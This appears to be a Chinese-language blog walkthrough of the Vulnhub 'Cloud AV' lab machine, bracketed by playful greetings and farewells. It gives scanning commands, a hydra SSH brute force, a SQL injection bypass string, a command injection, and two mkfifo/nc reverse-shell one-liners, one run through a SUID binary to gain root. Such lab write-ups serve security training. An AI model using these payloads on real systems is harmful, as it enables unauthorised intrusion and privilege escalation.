你好啊

吃了么,睡了么

有拥抱么,有晚安么

剪刀石头布,哈,我又赢了

靶场简介

2022

11-12

Vulnhub

地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

描述:
这是一个云端反病毒扫描程序!是一种基于云的防病毒扫描服务。
目前,它处于测试模式。系统要求您测试设置并查找漏洞并升级隐私。

难度:简单
目标:获得root权限

涉及的任务:
端口扫描
网页应用攻击
SQL注入
命令注入
暴力破解
代码分析

系统环境

2022

11-12

操作系统:

物理机:Arch linux
虚拟机:kali linux
虚拟机程序:Virtualbox

使用程序:

arp-scan 用于目标发现
ping 用于目标发现
arping 用于目标发现
nmap 用于服务识别
nc 用于shell反弹
hydra 用于密码破解
burpsuite 用于web测试

测试过程

主机发现

1
2
3
4
5
6
sudo arp-scan -I eth0 -l                                                               #arp发现,确定目标ip地址
nmap -sn 192.168.56.1/24 #ping扫描,禁用端口扫描
for i in $(seq 0 10); do ping -c 1 192.168.56.$i; done #shell 批量ping扫描
for i in $(seq 0 10); do sudo arping -c 1 192.168.56.$i; done #shell 批量arping扫描

部分列举,方式很多,根据实际场景进行选择测试

服务识别

1
2
3
4
nmap -p- 192.168.56.108    #进行全端口扫描
nmap -p22,8080 192.168.56.108 #进行端口服务识别

根据发现的主机目标进行全端口扫描,随后进行端口服务发现

服务入侵

1
2
3
hydra -l root -P rockyou.txt -t 32 -vV  192.168.56.108 ssh -f     #指定账户,密码字典,对目标进行ssh暴力破解 

对发现的服务进行入侵,ssh尝试未果
1
2
ssh暴力破解长时间未成功,随后web访问8080端口,出现输入框,需要密码,简单测试后发现sql注入漏洞
注入代码:" or 1=1 -- 后面有一个空格
1
2
随后进入一个新的页面,简单测试后发现存在命令行注入漏洞
命令行注入代码: | command
1
2
通过命令行注入,执行nc,反弹shell
rm /tmp/m;mkfifo /tmp/m;cat /tmp/m|/bin/sh -i 2>&1|nc 192.168.56.107 4444 >/tmp/m
1
2
随后在用户主目录发现拥有suid,root权限的可执行程序,通过此程序调用nc反弹shell,获得root权限
./upload_cloudav "rm /tmp/m;mkfifo /tmp/m;cat /tmp/m|/bin/sh -i 2>&1|nc 192.168.56.107 5555 >/tmp/m"

完结撒花

积极向上

热爱生活

啊,再见了,再见了,哈

我们会再见的对么

再见你要幸福

燕子,燕子